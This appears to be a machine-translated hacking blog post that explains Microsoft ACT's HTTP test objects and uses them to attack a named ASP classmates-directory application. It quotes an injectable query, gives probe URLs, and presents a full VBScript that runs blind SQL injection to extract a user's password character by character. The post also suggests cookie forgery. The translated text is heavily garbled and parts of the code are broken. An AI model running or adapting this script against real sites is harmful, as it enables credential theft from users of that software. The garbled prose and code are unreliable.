Yesterday, in the machine, I accidentally opened a VBS script, suddenly found a Test.sendRequest that didn't have seen before. SsendRequest.
http: // "; & g_sserver &" /testfiles/browser.asp "), although the object has not seen, it means that the HTTP request is sent. I thought it was the Dongdong of the WMI Script API, but did not find the creation of objects. The statement, this script in the Microsoft Act, Microsoft Act is a tool for a test site with Visual Studio.Net, which has been opened before, but it has not studied how to use it, so I open help files (I have: MS-Help in MSDN: MS-Help : //Ms.vscc/ms.msdnvs.2052/Act/htm/actml_main.htm), roughly read, it is a set of HTTP client objects (do not know if this is not accurate), put the object and The property is listed, you can know, the following is the test object model, and an Application object model. If you have an in-depth understanding, please see MSDN, I am still learning:
-Connection object
Close method
Send method
Isopen property
Port attribute
RedirectDepth property
Server property
USSSL attribute
-Cookie object // Because it is a test site, use the script to simulate multiple users, this can be used to set the cookie of each user, which can also be used to make a hands and feet, huh, huh
Expires property
Name attribute
Path property
Value property
-Cookies object
Add method
REMOVE method
RemoveAll method
Count attribute
Item property
-Header object
Name attribute
Value property
-Request object
Body property
CODEPAGE attribute
EncodeBody property
EncodeQueryAsutf8 properties
HEADERS attribute
HTTPVERSION attribute
Path property
ResponseBuffersize property
VERB attribute
-Response object
Body property // Get the body of the HTTP response. Returns only the body part in the response buffer.
CODEPAGE attribute
BYTESRECV attribute
Bytessent properties
ContentLength attribute
HEADERS attribute
HEADERSIZE attribute
HTTPVERSION attribute
Path property
Port attribute
Resultcode property
HTTP status code
Server property
TTFB attribute
TTLB attribute
USSSL attribute
-Test object
CREATECONNECTION method
CreateRequest method
GetCurrentUser method
GETGLOBALINDEX method
GetGlobalVariable method
GetNextuser method
IncrementGlobalIndex method
SendRequest method
SetglobalIndex method
SetglobalVariable method
SLEEP method
TRACE method
TraceLevel property
-User object
Cookies attribute
Name attribute
Password attribute
At this point, you may think of a lot of use, such as test sites, test servers, test programs, cookies forgery ... see your imagination, I am the first thing is the beginning of the sentence: Test.sendRequest ("
Http: // "; & g_sserver &" /testfiles/browser.asp"), passRequest method description:
Oresponse = Test.sendRequest (Strurl)
Parameters: Strurl AS String: Represents the requested URL
Return Value: Oresponse as reponse: Indicates the object of the web server response representative of the response request (that is, the above Response object)
This object allows us to easily write an attack program for 80 ports, such as the function of the snow, now popular SQL INJECTION, the online SQL Injection attack program is mostly written by Perl, I will not write with C A complete Socket program is relatively cumbersome, this object provides the possibility of VBS, and the program is quite simple, although sacrificed efficiency, but for our rookie, it is a good way. Let's take an example to explain: the windy moon class record is a Set of free ASP classmates, maybe you have never heard of it, but in the free web program of the classmate record, there is a lot of sites, so there are many sites to use it after using it (I have read it. The classmates of the high school website is to rewrite this set of programs). I have V1.60 in my hand. I went down from the online Down. When I wrote this post, I couldn't get the latest version. Anyway, just an example, let's use it, huh, huh. Greatly, some code discovered many places that can be injected, the most obvious (because it is seen in the home page), it is the message board in the form of its forum showThread.asp:
...
TopiciD = Request ("rootid")
SQL = "SELECT TOCI, HITS from bbs where parentid = 0 and bbsid =" & Topici
SET RS = Conn.execute (SQL)
...
Very old and classic one, huh, tried:
http://192.168.101.16/txl/showthrea..d=7 and 1=1
http://192.168.101.16/txl/showthrea..d=7 and 1=2
I know that the username can also be seen in the user list. So this example will demonstrate the guess password, what? Is it too simple? Just an example, don't laugh, it is not a smooth sailing ~~ Write very poor, especially if the probe is correct, you should quit the loop, but I can't think of how to quit (BREAK? EXIT?), But the program for this password is full, one 6 The bits of the password guess for about 15 seconds, and the improvement will increase a lot, but the efficiency is always comparable to Perl.
To use this object to install Microsoft Act is a tool in Visual Studio.net, I fails directly with Regsrv32 registration on another machine, so I still have to install it.
'***************************************************
'Warm Moon Society V1.60 Vulnerability Test Script By Luoluo
'Note: Need ACT tools in Visual Studio.NET
'***************************************************
Option expedition
ON Error ResMe next
DIM TEST
DIM O_RESPONSE
DIM WRONG
DIM I, J, K
DIM PWD_LEN
DIM PWD
DIM STRINGS
DIM Username
'User name of the person who gets to crack from the command line
IF wscript.arguments.count> 0 THEN
Username = wscript.arguments (0)
Else
Username = "luoluo"
END IF
WScript.echo "Start detection, please wait ..."
'The logo of the correct page, this is easy to find, because as long as it is different parts returned by the two pages.
WRONG = "LuoluoisAnesehacker"
'Storage password
PWD = ""
'Password character range
Strings = "0123456789abcdefghijklmnopqrstuvwxyz"
'Establish an object
Set test = createObject ("act.test") 'gets the length of the user's password
For i = 0 to 128 STEP 1
'Send a request, return a response object, the address length can be used as a section, so look good
Set o_response = Test.sendRequest ("& I &" '% 20and% 20Userid =' "& username &") ")
'If you have the correct flag in the returned page, it is right.
IF INSTR (O_RESPONSE.BODY, WRONG) <> 0 THEN
PWD_LEN = "& I &" "
END IF
NEXT
'Tell the user's password
For j = 1 to PWD_LEN STEP 1
For K = 1 to Len (Strings) Step 1
Set o_response = Test.sendRequest ("
http://192.168.101.16/txl/showthread.asp?rootid=7 and exists (select Userid From student where LEFT (Userpwd, "& j &") = '"& pwd & MID (Strings, K, 1) & "'% 20And% 20Userid ='" & username & ")")
IF INSTR (O_RESPONSE.BODY, WRONG) <> 0 THEN
PWD = PWD & MID (Strings, K, 1)
END IF
NEXT
NEXT
IF Err THEN
WScript.echo "error:" & error.description
Error.clear
Else
'Output password
Wscript.echo "Password:" & PWD
END IF
Set test = Nothing
